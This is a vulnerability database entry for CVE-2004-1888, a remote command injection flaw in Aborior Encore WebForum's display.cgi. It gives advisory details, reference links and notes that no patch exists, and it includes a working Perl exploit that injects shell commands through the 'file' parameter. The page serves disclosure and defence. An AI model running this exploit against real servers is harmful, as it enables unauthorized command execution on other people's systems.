CVE-2004-1888
CVSS 7.5
Published: 2004-12-31 00:00:00
Last revised: 2016-10-17 23:02:25

[Original] display.cgi in Aborior Encore WebForum allows remote attackers to execute arbitrary commands via shell metacharacters in the file variable.


[CNNVD] Aborior Encore Web Forum remote arbitrary command execution vulnerability (CNNVD-200412-425)

        
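        Aborior's Encore WebForum is a web-based forum system.
        Aborior's Encore WebForum does not sufficiently filter user-submitted URI requests. A remote attacker can exploit this vulnerability to execute arbitrary commands on the system with the privileges of the web server.
        The problem is in the 'display.cgi' script: the value the user submits for the 'file' parameter is not sufficiently filtered, so submitted data containing shell metacharacters can be executed on the system with the privileges of the web server.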
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

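- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found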

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1888
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1888
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-425
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=108100973820868&w=2
(UNKNOWN)  BUGTRAQ  20040403 Remote Exploit for Aborior's Encore Web Forum
http://www.securityfocus.com/archive/1/archive/1/437813/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060620 display.cgi
http://www.securityfocus.com/archive/1/archive/1/437978/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060621 Re: display.cgi
http://www.securityfocus.com/bid/10040
(UNKNOWN)  BID  10040
http://www.securitytracker.com/id?1009652
(UNKNOWN)  SECTRACK  1009652
http://xforce.iss.net/xforce/xfdb/15725
(UNKNOWN)  XF  encore-display-command-execution(15725)

- Vulnerability information

Aborior Encore Web Forum remote arbitrary command execution vulnerability
High risk   Input validation
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        
        

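- Advisories and patches

        Vendor patch:
        Aborior
        -------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: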
        
        http://www.aborior.com/encore/index.shtml

- Vulnerability information (23907)

Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability (EDBID:23907)
cgi webapps
2004-04-03 Verified
0 K-159
N/A
source: http://www.securityfocus.com/bid/10040/info

Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.

A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application. 

############################################################
#!/usr/bin/perl -w
#
# Remote Exploit Aborior's Encore Web Forum by Schizoprenic
# Bug found by k-159 from g-security.tk

require LWP::UserAgent;
use Getopt::Std;

getopts('t:d:c:');
our($opt_t, $opt_d, $opt_c);

my $target = $opt_t;
my $dir = $opt_d;
my $cmd = $opt_c;

print "Remote Exploit Aborior's Encore Web Forum  by Schizoprenic\n";
print "Xnuxer Research Laboratory (http://www.infosekuriti.com)\n";
print "Target: $target\n";
print "Path Dir: $dir\n";
print "Command: $cmd\n";

my $ua = LWP::UserAgent->new;
$ua->agent("IE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$req = "http://$target$dir/display.cgi?preftemp=temp&page=anonymous&file=|$cmd|";

my $response = $ua->get($req);
print "--------------------RESULT--------------------\n";

if ($response->is_success) {
     print $response->content;
} else {
     die $response->status_line;
}

print "----------------------------------------------\n";

# EOF by Xnuxer
--
		

- Vulnerability information

16831
Aborior Encore WebForum display.cgi file Variable Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Aborior Encore WebForum contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when shell commands are passed via the 'file' variable in the display.cgi script. This flaw may lead to a loss of integrity.

- Timeline

2004-04-03 Unknown
2004-04-03 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

 

 
